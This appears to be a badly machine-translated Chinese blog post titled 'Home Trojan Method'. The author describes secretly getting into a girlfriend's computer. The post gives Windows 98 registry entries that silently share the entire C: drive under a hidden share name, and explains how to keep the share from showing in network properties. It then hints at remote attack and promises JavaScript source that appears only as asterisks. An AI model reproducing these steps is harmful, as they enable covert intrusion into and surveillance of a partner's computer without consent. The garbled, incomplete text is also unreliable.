Home Trojan Method (ZT)

xiaoxiao2021-03-06  45

Home Trojan's production method In order to enter the girlfriend's computer, I have a good strength, and finally ... I think that I think it is good to see the ************ *********************************************************** ******* I don't know if you don't know, Windows98 has a shared vulnerability; in HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Network / Lanman Add a key such as RWC $, then add a few key values: " Flags "= dword: 00000302" Type "= dword: 00000000" path "=" c: // "This will set the C disk to share, and share name RWC $. And you can not see in the network properties (change "Flags" = DWORD: 00000302 to flash "= dword: 00000402 can be seen), as for the shared C: how to attack, I don't want me to say it. I have seen the previous one knows that the registry through the net industry is very easy. In order to take care of the friends who have never seen, I will bear the source code of JS in the following ************ *********************************************************** *******